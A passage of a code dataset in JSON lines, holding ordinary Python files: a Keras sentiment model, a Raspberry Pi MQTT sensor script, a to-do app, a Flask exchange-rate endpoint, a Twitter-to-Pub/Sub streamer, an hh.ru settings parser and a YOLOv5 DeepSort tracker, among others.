kernel_initializer='he_uniform')(x_gru)\n avg_pool3_gru = GlobalAveragePooling1D()(x3)\n max_pool3_gru = GlobalMaxPooling1D()(x3)\n \n x_lstm = Bidirectional(CuDNNLSTM(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool1_lstm = GlobalAveragePooling1D()(x1)\n max_pool1_lstm = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool3_lstm = GlobalAveragePooling1D()(x3)\n max_pool3_lstm = GlobalMaxPooling1D()(x3)\n \n \n x = concatenate([avg_pool1_gru, max_pool1_gru, avg_pool3_gru, max_pool3_gru,\n avg_pool1_lstm, max_pool1_lstm, avg_pool3_lstm, max_pool3_lstm])\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(128,activation='relu') (x))\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(64,activation='relu') (x))\n x = Dense(5, activation = \"sigmoid\")(x)\n model = Model(inputs = inp, outputs = x)\n model.compile(loss = \"binary_crossentropy\", optimizer = Adam(lr = lr, decay = lr_d), metrics = [\"accuracy\"])\n history = model.fit(X_train, y_one_hot, batch_size = 128, epochs = 20, validation_split=0.1, \n verbose = 1, callbacks = [check_point, early_stop])\n model = load_model(file_path)\n return model\nembedding_matrix = get_embed_mat(embedding_path)\nmodel = build_model(lr = 1e-3, lr_d = 0, units = 128, dr = 0.5)\npred = model.predict(X_test, batch_size = 1024, verbose = 1)\npred\npredictions = np.round(np.argmax(pred, axis=1)).astype(int)\npredictions\nsub['Sentiment'] = predictions\nsub.to_csv(\"new_sub.csv\", index=False)\n","repo_name":"aorursy/new-nb-3","sub_path":"jayachandra1221_rnn-lstm.py","file_name":"jayachandra1221_rnn-lstm.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6831066974","text":"#rasberry pi IO\nimport RPi.GPIO as GPIO\n#MCP3008 IO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n#MCP3008 setting up\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n#setup LED\nledGPIOnum = 26 #pin number on PI\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(ledGPIOnum,GPIO.OUT)\nLEDstate = 0\n#setup MCP print\nsoundChannelPin = 4\ngateChannelPin = 1\naudioChannelPin = 3\n#pin channels\n#gate = 1\n#light = 2\n#audio = 3\n#envelope = 4\n\n\n\n\nimport paho.mqtt.client as mqtt\nimport json as js\nimport time\n\n#import nearby devices\nimport proximity as prox\n\n\n#MQTT_SERVER = \"localhost\"\n#MQTT_SERVER = \"iot.eclipse.org\"\n#MQTT_SERVER = \"100.80.241.236\"\nMQTT_SERVER = \"192.168.137.110\"\nMQTT_PATH = \"broadcast\"\n\nsoundValue = 0\nregistry = {}\naddressList = []\nproxRegis = {}\ncurrent_3audioReadings = {}\n\ninfo = {'device_id':'B8:27:EB:DF:DO:DD','sensors':['Temperature', 'Audio', 'Gate', 'Envelope', 'Humidity', 'Light']}\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n\n #-- Finds Broadcast and Sends Data to other devices on Broadcast --#\n #if (message_sent_State == False):\n client.subscribe(MQTT_PATH)\n #client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\n message_sent_State = True\n #client.publish(MQTT_PATH, \"HMM\")\n #print(js.dumps(info, sort_keys=True))\n\n #-- Listens for response --#\n client.subscribe(info['device_id'])\n client.subscribe(info['device_id']+'/sound')\ndef on_disconnect(client, userdata, msg):\n message_sent_State = False\n\n# Callback when message is recieved.\ndef on_message(client, userdata, msg):\n global registry,proxRegis\n print(msg.topic+\" \"+str(msg.payload))\n\n\n\n #parse and save\n #if (msg.topic != info['device_id']):\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n\n print(input_data)\n registry[input_data['device_id']] = input_data['sensors']\n print(input_data['device_id'])\n #publish directly to new id\n client.publish(input_data['device_id'],js.dumps(info))\n addressList = prox.proximity()\n if input_data['device_id'] in addressList:\n proxRegis[input_data['device_id']] = True\n\n else:\n proxRegis[input_data['device_id']] = False\n print(\"List if nearby devices \\n\")\n print(js.dumps(proxRegis, indent=4))\n\n\ndef on_message_Sound(client, userdata, msg):\n global registry,proxRegis,current_3audioReadings,LEDstate\n listVal = {}\n print(\"sound callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #give data to request portion\n if 'device_id' in input_data:\n print(\"DEVICE ID\")\n #for sensor in input_data['sensors']:\n listVal['Envelope'] = soundValue\n client.publish(input_data['device_id']+'/sound', js.dumps(listVal))\n #take data and compare it to ourvalues\n else:\n print(\"Soundvalue on Callback\" + str(current_3audioReadings['Envelope']))\n if int(input_data['Envelope']) > int(current_3audioReadings['Envelope']):\n print(\"DATA\")\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n#this portion is just a on_message_Sound(Request portion of Code used to\n#Colaborate with Matt's Group)\ndef on_message_clap_detected(client,userdata,msg):\n #callback function takes request from specific pi with device_id and\n #gives back our sound data to clap_response+device_id\n\n #Assumes they give the device_id\n global current_3audioReadings,LEDstate\n listVal = {}\n print(\"clap_detected request callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #iterate through values needed, find if a list of sensors exists\n if 'sensors' in input_data:\n for sensors in input_data['sensors']:\n if sensors in current_3audioReadings:\n listVal[sensors] = current_3audioReadings[sensors]\n #if the sensor wanted is empty assume they want at least one sound value\n else:\n listVal['Envelope'] = current_3audioReadings['Envelope'] #envelope value\n listVal['Gate'] = current_3audioReadings['Gate'] #envelope value\n listVal['Audio'] = current_3audioReadings['Audio'] #envelope value\n\n client.publish('clap_response'+input_data['device_id'], js.dumps(listVal))\n\n\n\nclient = mqtt.Client()\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disonnect = on_disconnect\nclient.message_callback_add(\"B8:27:EB:DF:D0:DD/sound\", on_message_Sound)\nclient.message_callback_add(\"clap_detected\", on_message_Sound)\n\nclient.connect(MQTT_SERVER, 1883, 60)\n\ntry:\n client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\nexcept:\n print(\"Did not publish\")\n\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n#client.loop_forever()\nsoundValue = 0\nLEDstate = 0\nprevsoundValue = 0\nclient.loop_start()\nwhile True:\n\n soundValue = mcp.read_adc(soundChannelPin)#same as envelope\n gateValue = mcp.read_adc(gateChannelPin)\n auidoValue = mcp.read_adc(audioChannelPin)\n if gateValue >= 600:\n time.sleep(.2)\n print(\"made it\")\n current_3audioReadings['Gate'] = gateValue\n current_3audioReadings['Audio'] = auidoValue\n current_3audioReadings['Envelope'] = soundValue #envelope value\n\n current_soundValue = soundValue\n\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n #send to all connected devices\n wanted_info = {'device_id':'B8:27:EB:DF:D0:DD','sensors':['Gate','Envelope','Audio']}\n if proxRegis:\n for pi in proxRegis:\n #print(\"this is the pi:\" + pi)\n if ('Envelope' in registry[pi]) and (proxRegis[pi] == True):\n #print(\"This is the registry:\" + str(registry[pi]))\n client.publish(pi+'/sound', js.dumps(wanted_info))\n\n\n time.sleep(0.2)\n\n#LED pin setup\n","repo_name":"bjalvara/mqtt","sub_path":"orchestration.py","file_name":"orchestration.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72456078119","text":"import pandas as pd\n\nclass Frecuencia:\n def __init__(self):\n self.data = pd.read_csv('../recursos/frequency_wikimedia', sep=\" \", header=None)\n self.data.columns = ['numero', 'palabra', 'frecuencia']\n self.data = self.data.drop(columns=['numero'])\n\n def obtener_frecuencia(self, palabra):\n token = palabra['token'].lower()\n if token in self.data['palabra'].tolist():\n elem = self.data.loc[self.data['palabra'] == token]['frecuencia']\n return elem.tolist()[0]\n else:\n return 0.0\n\n def obtener_mas_frecuente(self, lista_palabras):\n frecuencia_maxima = max([obtener_frecuencia(x) for x in lista_palabras])\n for palabra in lista_palabras:\n if self.obtener_frecuencia(palabra) == frecuencia_maxima:\n return palabra\n\n def ordenar_por_frecuencia(self, lista_palabras):\n return list(reversed(sorted(lista_palabras, key=self.obtener_frecuencia)))\n","repo_name":"joacolej/proygrado","sub_path":"src/recursos/lista_de_frecuencia.py","file_name":"lista_de_frecuencia.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"31716504622","text":"import pprint #like var_dump\nimport sys\nimport os #files\nimport csv \n\n\nDATABASEFILE=\"database.csv\"\nCHECKBOX_COLUMN_NAME='Done'\nTODO_COLUMN_NAME='To do'\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n Default = '\\033[99m'\n\n\ndef clear_console():\n \"\"\"Clearing console\"\"\"\n os.system('cls' if os.name=='nt' else 'clear')\n\n\ndef print_warning(warning, type='yellow'):\n \"\"\"Information print\"\"\"\n if type=='yellow':\n print(bcolors.WARNING+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\"+bcolors.ENDC)\n \n if type=='red':\n print(bcolors.FAIL+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC)\n if type=='green':\n print(bcolors.OKGREEN+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC) \n\n\n\ndef add(item_to_add):\n \"\"\"Add item to list in file\"\"\"\n\n with open(DATABASEFILE, 'a' ) as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({CHECKBOX_COLUMN_NAME: ' ', TODO_COLUMN_NAME: item_to_add})\n clear_console()\n print_warning(\"Item added.\", 'green') \n todo_list(write=True)\n \n\ndef save_to_file(data):\n \"\"\"Save data to file\"\"\"\n\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n for item in data:\n writer.writerow({CHECKBOX_COLUMN_NAME: item[1], TODO_COLUMN_NAME: item[2]})\n\n\ndef todo_list(write=0):\n \"\"\"List of todo\"\"\"\n \n with open(DATABASEFILE, newline='') as f:\n reader = csv.reader(f)\n list_todo = []\n if write is True:\n print(\"You saved the following to-do items: \\n \")\n i=0\n for row in reader:\n if i != 0:\n print(\" %3d.\" % (i) + \" [\" + str(row[0]) + \"] \" + str(row[1]))\n list_todo.append([i, row[0], row[1]])\n i+=1\n print()\n i=0 \n \n for row in reader:\n list_todo.append([i, row[0], row[1]])\n i+=1\n\n return list_todo \n\n\ndef mark_todo(mark=True):\n \"\"\"marking items\"\"\" \n \n td_list=todo_list(True) #write todo list\n while True:\n try: \n if (mark==False):\n mark_number=input('Which one you want to unmark (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]=str(' ')\n clear_console()\n print_warning(\"Item unmarked.\") \n else:\n mark_number=input('Which one you want to mark as completed (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]='x' \n clear_console()\n print_warning(\"Item marked.\") \n save_to_file(td_list) \n todo_list(write=True)\n\n except ValueError:\n \n clear_console()\n print_warning(\"It is not a number.\",'red') \n mark_todo()\n except IndexError:\n clear_console()\n print_warning(\"There is no item with this ID\",'red') \n mark_todo()\n\n \n \ndef archive():\n \"\"\"delete marked items from list\"\"\"\n\n to_do_list=todo_list(0)\n newtodolist=[]\n for item in to_do_list:\n if item[1] != 'x':\n newtodolist.append([' ', item[1], item[2]]) \n \n save_to_file(newtodolist)\n print_warning(\"Deleted marked items\", 'red')\n todo_list(write=True)\n\n\ndef checkdatabase():\n \"\"\"checking database file, if !exist than create it\"\"\" \n\n if not os.path.exists(DATABASEFILE):\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n \n\ndef main():\n clear_console()\n todo_list(write=True)\n\n while True:\n \n action=input( \"Please specify a command [add, mark, unmark, archive, x to exit]: \")\n clear_console()\n\n if action == \"add\": #loop: adding todo items\n item_to_add=' '\n todo_list(write=True)\n while item_to_add!='':\n item_to_add=input('Add an item (or press enter to leave): ')\n if (item_to_add!=''):\n add(item_to_add)\n else:\n clear_console()\n todo_list(write=True)\n \n\n elif action == \"list\": #this is not used, list is always visible\n clear_console()\n todo_list(write=True)\n\n elif action == \"mark\":\n mark_todo()\n \n\n elif action == \"unmark\":\n mark_todo(False)\n \n\n elif action == \"archive\":\n archive()\n \n\n elif action==\"x\": #exit program\n break \n \n else:\n print_warning(\"Error: wrong command!\", 'red') \n todo_list(write=True)\n \n\n\n\ncheckdatabase() #if file doesn't exist than create it'\nmain()","repo_name":"michalosak/calculator","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31343441875","text":"import subprocess\nimport os\nimport stat\nimport platform\n\nfrom helpers import asyncronize_function\n\nconverter_path = None\n\nif \"Windows\" in platform.architecture()[1]:\n converter_path = \"./ffmpeg.exe\"\nelse:\n converter_path = \"./ffmpeg\"\n st = os.stat(\"./ffmpeg\")\n os.chmod(\"./ffmpeg\", st.st_mode | stat.S_IEXEC)\n\nasync def convert(voice_ogg_content):\n completedProcess = await asyncronize_function(\n subprocess.run,\n [converter_path, \"-i\", \"pipe:0\", \"-f\", \"wav\", \"pipe:1\"],\n input=voice_ogg_content,\n capture_output=True\n )\n return completedProcess.stdout","repo_name":"dozen1488/telebot","sub_path":"modules/convert_ogg_module.py","file_name":"convert_ogg_module.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"28184811690","text":"from dataclasses import asdict\n\nimport requests\nfrom flask import request, jsonify, Blueprint\nfrom config import configuration\nfrom app.dto.get_exchange_rate_response import GetExchangeRateResponse\nfrom app.helpers.check_currencies import check_currencies\nfrom app.decorators.auth import token_required\n\nmodule = Blueprint(\"exchange\", __name__, url_prefix=\"/exchange\")\n\n\n@module.route('/pair', methods=['POST', 'GET'])\n@token_required()\ndef get_exchange_rate():\n from_currency = request.json['from'] # marshmallow Validation icin.\n to_currency = request.json['to']\n url = configuration.BASE_URL + configuration.API_KEY\n if check_currencies(from_currency, to_currency):\n pair_url = url + \"/pair/\" + from_currency + \"/\" + to_currency\n print(\"pair_url \" + pair_url)\n print(\"pair_url \" + pair_url)\n response = requests.get(pair_url)\n conversion_rate = response.json()['conversion_rate']\n base_code = response.json()['base_code']\n target_code = response.json()['target_code']\n return asdict(\n GetExchangeRateResponse(conversion_rate=conversion_rate,\n base_code=base_code,\n target_code=target_code))\n else:\n return jsonify({\"conversion_rate\": \"The Currency is not correct!!!\"})\n","repo_name":"ozgurshahin/ExchangeRateApi","sub_path":"app/routes/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36782941916","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport twitter_credentials as tw\nfrom google.cloud import pubsub_v1\n#from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#analyzer = SentimentIntensityAnalyzer()\n\nproject_id = \"cf-learninggcp-123\"\ntopic_name = \"tweets\"\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(project_id, topic_name)\n\n#consumer key, consumer secret, access token, access secret.\nckey=tw.CONSUMER_KEY\ncsecret=tw.CONSUMER_SECRET\natoken=tw.ACCESS_TOKEN\nasecret=tw.ACCESS_TOKEN_SECRET\n\nclass listener(StreamListener):\n\n def on_data(self, data):\n try:\n data = json.loads(data)\n tweet = data['text']\n created_at = data['created_at']\n source = data['source']\n usuario = data['user']['name']\n ubicacion = data['user']['location']\n coordenadas = data['geo']\n time_ms = data['timestamp_ms']\n # vs = analyzer.polarity_scores(tweet)\n # sentiment = vs['compound']\n mensaje = json.dumps({\"twitter\": tweet, \"time_stamp\": time_ms, \"created_at\": created_at, \"source\": source, 'usuario': usuario, 'ubicacion': ubicacion, 'coordenadas': coordenadas})\n\n print(mensaje)\n future = publisher.publish(topic_path, mensaje)\n print(future.result())\n\n except KeyError as e:\n print(str(e))\n return(True)\n\n def on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=[\"fibertel\", \"cablevision\", \"@personal\"])","repo_name":"cesarfarallo/twitter","sub_path":"twitter_TECO.py","file_name":"twitter_TECO.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22041190542","text":"# 팔씨름 문제\n\n# 소정이와 세정이는 점심 값을 누가 낼 지 정하기 위해 팔씨름을 하기로 했다. 공정하고 재밌는 경기를 위해 둘은 15번 팔씨름을 하여 8번 이상 이기는 사람이 점심 값을 면제받기로 하였다.\n\n# 둘은 지금까지 k번의 팔씨름을 진행했다. 이 결과는 길이가 k인 ‘o’ 또는 ‘x’로만 구성된 문자열 S[1..k]로 나타낼 수 있다. S[i]가 ‘o’면 소정이가 i번째 경기에서 승리했다는 것이고, ‘x’면 패배했다는 것이다.\n\n# 소정이는 앞으로 팔씨름을 15번째 경기까지 진행했을 때 자신이 점심값을 면제받을 가���성이 있는지 알고자 한다. 이를 대신해 주는 프로그램을 작성하라.\n\n# [입력]\n# 첫 번째 줄에 테스트 케이스의 수 T가 주어진다.\n# 각 테스트 케이스는 하나의 줄로 이루어진다. 각 줄에는 ‘o’ 또는 ‘x’로만 구성된 길이가 1 이상 15 이하인 문자열 S가 주어진다.\n\n# [출력]\n# 각 테스트 케이스마다, 소정이가 점심값을 면제받을 가능성이 있다면 ‘YES’, 없다면 ‘NO’를 출력한다.\n\n# 입력\n# 3\n# oxoxoxoxoxoxoxo\n# x\n# xxxxxxxxxxxx\n\n# 출력\n# #1 YES\n# #2 YES\n# #3 NO\n\nT = int(input())\nfor tc in range(1, T+1):\n s = input()\n \n # 이긴 횟수 카운트 \n num_wins = s.count('o')\n\n # 남은 판수 카운트\n num_remaining = 15 - len(s)\n\n # 남은 판수와 이긴 횟수를 더한 것이 8번 이상이면 승리 가능성\n if num_wins + num_remaining >= 8:\n print(f\"#{tc} YES\")\n else:\n print(f\"{tc} NO\")","repo_name":"glory0224/Algorithm","sub_path":"SWEA/D3/arm wrestling.py","file_name":"arm wrestling.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30393608348","text":"r\"\"\"Parse command line arguments\n\nCommand parameters:\n refresh : bool - Refresh data from remote server.\n num_workers : int - Number of workers for threading.\n options : dict - Options for GET request to hh api.\n\nExample:\n options:\n {\n \"text\": \"Python Developer\",\n \"area\": 1,\n \"per_page\": 50\n }\n\nParser parameters:\n update : bool - Update JSON config if needed.\n\n------------------------------------------------------------------------\n\nGNU GENERAL PUBLIC LICENSE\nVersion 3, 29 June 2007\n\nCopyright (c) 2020 Kapitanov Alexander\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT\nNOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE\nDEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nOR CORRECTION.\n\n------------------------------------------------------------------------\n\"\"\"\n\n# Authors : Alexander Kapitanov\n# ...\n# Contacts : \n# License : GNU GENERAL PUBLIC LICENSE\n\nimport argparse\nimport json\nfrom typing import Dict, Optional, Sequence\n\n\nclass Settings:\n r\"\"\"Researcher parameters\n\n Parameters\n ----------\n config_path : str\n Path to config file\n input_args : tuple\n Command line arguments for tests.\n no_parse : bool\n Disable parsing arguments from command line.\n\n Attributes\n ----------\n options : dict\n Options for GET request to API.\n refresh : bool\n Refresh data from remote server.\n save_result : bool\n Save DataFrame with parsed vacancies to CSV file\n num_workers : int\n Number of workers for threading.\n rates : dict\n Dict of currencies. For example: {\"RUB\": 1, \"USD\": 0.001}\n \"\"\"\n\n def __init__(\n self, config_path: str, input_args: Optional[Sequence[str]] = None, no_parse: bool = False,\n ):\n self.options: Optional[Dict] = None\n self.rates: Optional[Dict] = None\n self.refresh: bool = False\n self.num_workers: int = 1\n self.save_result: bool = False\n self.update: bool = False\n\n # Get config from file\n with open(config_path, \"r\") as cfg:\n config: Dict = json.load(cfg)\n\n if not no_parse:\n params = self.__parse_args(input_args)\n\n for key, value in params.items():\n if value is not None:\n if key in config:\n config[key] = value\n if \"options\" in config and key in config[\"options\"]:\n config[\"options\"][key] = value\n\n self.update = params.get(\"update\", False)\n if params[\"update\"]:\n with open(config_path, \"w\") as cfg:\n json.dump(config, cfg, indent=2)\n\n # Update attributes:\n for key, value in config.items():\n if hasattr(self, key):\n setattr(self, key, value)\n\n def __repr__(self):\n txt = \"\\n\".join([f\"{k :<16}: {v}\" for k, v in self.__dict__.items()])\n return f\"Settings:\\n{txt}\"\n\n def update_params(self, **kwargs):\n \"\"\"Update object params\"\"\"\n for key, value in kwargs.items():\n if hasattr(self, key) and value is not None:\n setattr(self, key, value)\n\n @staticmethod\n def __parse_args(inputs_args) -> Dict:\n \"\"\"Read arguments from command line.\n\n Returns\n -------\n arguments : dict\n Parsed arguments from command line. Note: some arguments are positional.\n\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"HeadHunter vacancies researcher\")\n parser.add_argument(\n \"-t\", \"--text\", action=\"store\", type=str, default=None, help='Search query text (e.g. \"Machine learning\")',\n )\n parser.add_argument(\n \"-p\", \"--professional_roles\", action=\"store\", type=int, default=None,\n help='Professional role filter (Possible roles can be found here https://api.hh.ru/professional_roles)',\n nargs='*'\n )\n parser.add_argument(\n \"-n\", \"--num_workers\", action=\"store\", type=int, default=None, help=\"Number of workers for multithreading.\",\n )\n parser.add_argument(\n \"-r\", \"--refresh\", help=\"Refresh cached data from HH API\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-s\", \"--save_result\", help=\"Save parsed result as DataFrame to CSV file.\", action=\"store_true\", default=None,\n )\n parser.add_argument(\n \"-u\", \"--update\", action=\"store_true\", default=None, help=\"Save command line args to file in JSON format.\",\n )\n\n params, unknown = parser.parse_known_args(inputs_args)\n # Update config from command line\n return vars(params)\n\n\nif __name__ == \"__main__\":\n settings = Settings(\n config_path=\"../settings.json\", input_args=(\"--num_workers\", \"5\", \"--refresh\", \"--text\", \"Data Scientist\"),\n )\n\n print(settings)\n","repo_name":"hukenovs/hh_research","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"18"}
+{"seq_id":"157725906","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Created on 2021/6/23 16:55\n Filename : yolov5_tracker.py\n Author : Taosy.W\n Zhihu : https://www.zhihu.com/people/1105936347\n Github : https://github.com/AFei19911012\n Description: 人车检测追踪,参考源码:https://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch.git\n\"\"\"\n\n# =======================================================\nimport cv2\nimport torch\nimport os\n\nfrom deep_sort.deep_sort import DeepSort\nfrom deep_sort.utils.parser import get_config\nfrom yolov5_detector import YOLOv5Detector\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'TRUE'\n\n\ndef draw_image(image, bbox_container, obj_ids):\n \"\"\" 绘制人车标签 \"\"\"\n \"\"\" 线宽 \"\"\"\n tl = 2 or round(0.002 * (image.shape[0] + image.shape[1]) / 2) + 1\n for i, bbox in enumerate(bbox_container):\n label = bbox['class']\n x1, y1, x2, y2 = bbox['box']\n c1, c2 = (x1, y1), (x2, y2)\n if label == 'person':\n color = (255, 0, 0)\n elif label == 'car':\n color = (0, 0, 255)\n else:\n color = (0, 255, 0)\n cv2.rectangle(image, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)\n \"\"\" 字体宽度 \"\"\"\n tf = max(tl - 1, 1)\n label_show = f'{label}-{obj_ids[i]}'\n t_size = cv2.getTextSize(label_show, 0, fontScale=tl/3, thickness=tf)[0]\n c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3\n \"\"\" filled \"\"\"\n cv2.rectangle(image, c1, c2, color, cv2.FILLED, cv2.LINE_AA)\n cv2.putText(image, label_show, (c1[0], c1[1] - 2), 0, tl/3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)\n\n\ndef xyxy_to_xywh(box):\n \"\"\" 目标框转换 \"\"\"\n x1, y1, x2, y2 = box\n w = x2 - x1\n h = y2 - y1\n x_c = int(x1 + w/2)\n y_c = int(y1 + h/2)\n return [x_c, y_c, w, h]\n\n\ndef cut_bbox_container(bbox_container):\n \"\"\" 只保留人车信息 \"\"\"\n container = []\n for bbox in bbox_container:\n label = bbox['class']\n confidence = bbox['confidence']\n box = bbox['box']\n if label in ['person', 'car']:\n container.append({'class': label, 'confidence': confidence, 'box': box})\n return container\n\n\ndef main():\n video_name = 'car.mp4'\n # video_name = 'car.mp4'\n cap = cv2.VideoCapture(f'data/videos/{video_name}')\n fource = cv2.VideoWriter_fourcc(*'mp4v')\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n vid_writer = cv2.VideoWriter(f'runs/track/{video_name}.mp4', fource, 30, (width, height))\n \"\"\" yolov5 目标检测器 \"\"\"\n yolov5_detector = YOLOv5Detector()\n \"\"\" deepsort 追踪器 \"\"\"\n cfg = get_config()\n cfg.merge_from_file(\"deep_sort/configs/deep_sort.yaml\")\n deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,\n max_dist=cfg.DEEPSORT.MAX_DIST,\n min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,\n nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP,\n max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,\n max_age=cfg.DEEPSORT.MAX_AGE,\n n_init=cfg.DEEPSORT.N_INIT,\n nn_budget=cfg.DEEPSORT.NN_BUDGET,\n use_cuda=True)\n window_name = 'Real-time tracking'\n while True:\n state, frame = cap.read()\n if not state:\n break\n \"\"\" 检测目标 \"\"\"\n image, bbox_container = yolov5_detector(frame)\n \"\"\" 仅保留人车信息\"\"\"\n bbox_container = cut_bbox_container(bbox_container)\n \"\"\" 初始化一些变量 \"\"\"\n xywh_bboxs = []\n labels = []\n confs = []\n for bbox in bbox_container:\n xywh_bboxs.append(xyxy_to_xywh(bbox['box']))\n labels.append(bbox['class'])\n confs.append(bbox['confidence'])\n \"\"\" 检测到目标后才有追踪 \"\"\"\n if labels:\n \"\"\" detections --> deepsort \"\"\"\n xywhs = torch.Tensor(xywh_bboxs)\n confss = torch.Tensor(confs)\n outputs = deepsort.update(xywhs, confss, labels, frame)\n obj_ids = []\n bbox_draw = []\n if len(outputs) > 0:\n for (x1, y1, x2, y2, label, track_id) in outputs:\n bbox_draw.append({'class': label, 'box': [x1, y1, x2, y2]})\n obj_ids.append(track_id)\n \"\"\" 绘图显示 \"\"\"\n draw_image(frame, bbox_draw, obj_ids)\n \"\"\" 输出一些信息 \"\"\"\n for info in bbox_draw:\n print(info)\n print(obj_ids)\n print('---')\n cv2.imshow(window_name, frame)\n vid_writer.write(frame)\n cv2.waitKey(1)\n \"\"\" 点 x 退出 \"\"\"\n if cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 1:\n break\n 